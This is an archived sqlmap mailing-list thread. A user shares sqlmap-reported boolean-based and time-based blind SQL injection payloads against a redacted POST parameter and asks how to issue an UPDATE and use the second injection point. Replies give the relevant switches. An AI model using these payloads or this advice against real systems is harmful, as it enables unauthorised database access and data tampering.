Thread: [sqlmap-users] stacked queries and different injection points

Brought to you by: inquisb

sqlmap-users

[sqlmap-users] stacked queries and different injection points

From: Bruno G. <gar...@gm...> - 2013-02-18 00:03:47

Hello,

I have this injection:

Place: POST
Parameter: xxxxx
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY
clause (RLIKE)
    Payload: xxx=xxxx&xxxx=test' RLIKE IF(8894=8894,0x4d7953514c,0x28) AND
'qGgA'='qGgA
    Vector: RLIKE IF([INFERENCE],[ORIGVALUE],0x28)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 OR time-based blind
    Payload: tipo=xxxxx&xxxxx=-1188' OR 7506=SLEEP(5) AND 'lBGC'='lBGC
    Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])


and I get this when using UPDATE

[WARNING] execution of custom SQL queries is only available when stacked
queries are supported.

Is there any workaround for this?
Also, it shows that it detected two injections, and it's using the first
one for doing the queries, is there anyway I could test the queries with
the second injection?

Thanks

Re: [sqlmap-users] stacked queries and different injection points

From: Leon J. <leo...@gm...> - 2013-02-18 08:03:56

On Monday, February 18, 2013, Bruno Garcia wrote:

> Hello,
>
> I have this injection:
>
> Place: POST
> Parameter: xxxxx
>     Type: boolean-based blind
>     Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY
> clause (RLIKE)
>     Payload: xxx=xxxx&xxxx=test' RLIKE IF(8894=8894,0x4d7953514c,0x28) AND
> 'qGgA'='qGgA
>     Vector: RLIKE IF([INFERENCE],[ORIGVALUE],0x28)
>
>     Type: AND/OR time-based blind
>     Title: MySQL > 5.0.11 OR time-based blind
>     Payload: tipo=xxxxx&xxxxx=-1188' OR 7506=SLEEP(5) AND 'lBGC'='lBGC
>     Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
>
>
> and I get this when using UPDATE
>
> [WARNING] execution of custom SQL queries is only available when stacked
> queries are supported.
>
> Is there any workaround for this?
> Also, it shows that it detected two injections, and it's using the first
> one for doing the queries, is there anyway I could test the queries with
> the second injection?
>

Hello,

I am not at a computer now, so this is out of my head.
If you want to test a specific parameter, use -p parameter_name , if you
want to use a specific injection type that was detected, use --type=E as an
example for error based injection.


-- 
Regards
L.

Sent using electronic mail ツ

Re: [sqlmap-users] stacked queries and different injection points

From: Miroslav S. <mir...@gm...> - 2013-02-18 08:17:45

Hi.

It's very simple. If stacking of queries is not supported (e.g.
id=1;UPDATE..) then you can't use non-query SQL statements. Pretty simple.

Bye
Dana 18.2.2013. 01:04 "Bruno Garcia" <gar...@gm...> je
napisao/la:

> Hello,
>
> I have this injection:
>
> Place: POST
> Parameter: xxxxx
>     Type: boolean-based blind
>     Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY
> clause (RLIKE)
>     Payload: xxx=xxxx&xxxx=test' RLIKE IF(8894=8894,0x4d7953514c,0x28) AND
> 'qGgA'='qGgA
>     Vector: RLIKE IF([INFERENCE],[ORIGVALUE],0x28)
>
>     Type: AND/OR time-based blind
>     Title: MySQL > 5.0.11 OR time-based blind
>     Payload: tipo=xxxxx&xxxxx=-1188' OR 7506=SLEEP(5) AND 'lBGC'='lBGC
>     Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
>
>
> and I get this when using UPDATE
>
> [WARNING] execution of custom SQL queries is only available when stacked
> queries are supported.
>
> Is there any workaround for this?
> Also, it shows that it detected two injections, and it's using the first
> one for doing the queries, is there anyway I could test the queries with
> the second injection?
>
> Thanks
>
>
>
>
>
>
> ------------------------------------------------------------------------------
> The Go Parallel Website, sponsored by Intel - in partnership with Geeknet,
> is your hub for all things parallel software development, from weekly
> thought
> leadership blogs to news, videos, case studies, tutorials, tech docs,
> whitepapers, evaluation guides, and opinion stories. Check out the most
> recent posts - join the conversation now.
> http://goparallel.sourceforge.net/
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>

Re: [sqlmap-users] stacked queries and different injection points

From: Bernardo D. A. G. <ber...@gm...> - 2013-02-18 09:56:07

Hi Bruno,

On 18 February 2013 00:03, Bruno Garcia <gar...@gm...> wrote:
> Also, it shows that it detected two injections, and it's using the first one
> for doing the queries, is there anyway I could test the queries with the
> second injection?

--technique T to force only time-based SQL injection. Refer to the
user's manual for further details on --technique switch.


-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)

Re: [sqlmap-users] stacked queries and different injection points

From: Leon J. <leo...@gm...> - 2013-02-18 11:32:04

On Monday, February 18, 2013, Bernardo Damele A. G. wrote:
>
> --technique T to force only time-based SQL injection. Refer to the
> user's manual for further details on --technique switch.
>
>
Apologies. It is technique not type :)


-- 
Regards
L.

Sent using electronic mail ツ